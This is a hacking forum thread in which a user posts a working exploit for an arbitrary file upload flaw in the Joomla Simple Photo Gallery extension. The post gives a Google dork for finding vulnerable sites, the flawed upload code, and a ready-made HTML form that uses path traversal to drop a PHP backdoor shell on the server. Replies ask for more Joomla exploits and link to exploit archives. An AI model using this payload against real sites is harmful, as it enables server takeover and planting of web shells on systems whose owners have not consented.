Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Joomla Simple Photo Gallery - Arbitrary File Upload

  • 0 Vote(s) - 0 Average


03-10-2017, 03:53 AM #1
green2gold Offline Junior Member **
Registered
Posts:4 Threads:1 Joined:Mar 2017 Reputation: 0
Mood: None
######################################################################
# Exploit Title: Joomla Simple Photo Gallery - Arbitrary File Upload
# Google Dork: inurl:com_simplephotogallery
# My Github: github.com/CCrashBandicot
# Vendor Homepage: https://www.apptha.com/
# Software Link: https://www.apptha.com/category/extensio...to-gallery
# Version: 1
# Tested on: Windows
######################################################################
 
# Vulnerable File : uploadFile.php
# Path : /administrator/components/com_simplephotogallery/lib/uploadFile.php
 
20.   $fieldName = 'uploadfile';
87.      $fileTemp = $_FILES[$fieldName]['tmp_name'];
94.         $uploadPath = urldecode($_REQUEST["jpath"]).$fileName;
96.      if(! move_uploaded_file($fileTemp, $uploadPath))
 
 
# Exploit :
 
<form method="POST" action="http://localhost/administrator/components/com_simplephotogallery/lib/uploadFile.php" enctype="multipart/form-data" >
    <input type="file" name="uploadfile"><br>
    <input type="text" name="jpath" value="..%2F..%2F..%2F..%2F" ><br>
    <input type="submit" name="Submit" value="Pwn!">
</form>
 
# Name of Shell Show you after Click on Pwn!, Name is random (eg : backdoor__FDSfezfs.php)
# Shell Path : http://localhost/backdoor__[RandomString].php

03-11-2017, 03:01 PM #2
Mr.Hawk Offline Junior Member **
Registered
Posts:3 Threads:0 Joined:Jul 2013 Reputation: 0
Mood: None
do u have any other joomla exploit?

03-11-2017, 05:17 PM #3
Hunter PCA Offline Junior Member **
Registered
Posts:25 Threads:6 Joined:Mar 2017 Reputation: 0
Mood: Thinking
(03-11-2017, 03:01 PM)Mr.Hawk Wrote:  do u have any other joomla exploit?

https://www.exploit-db.com/search/?actio...h&q=Joomla
https://0day.today/search?search_request=Joomla

Check these out

-- I know, I am something, because GOD never creates garbage --






Forum Jump:


Users browsing this thread:1 Guest(s)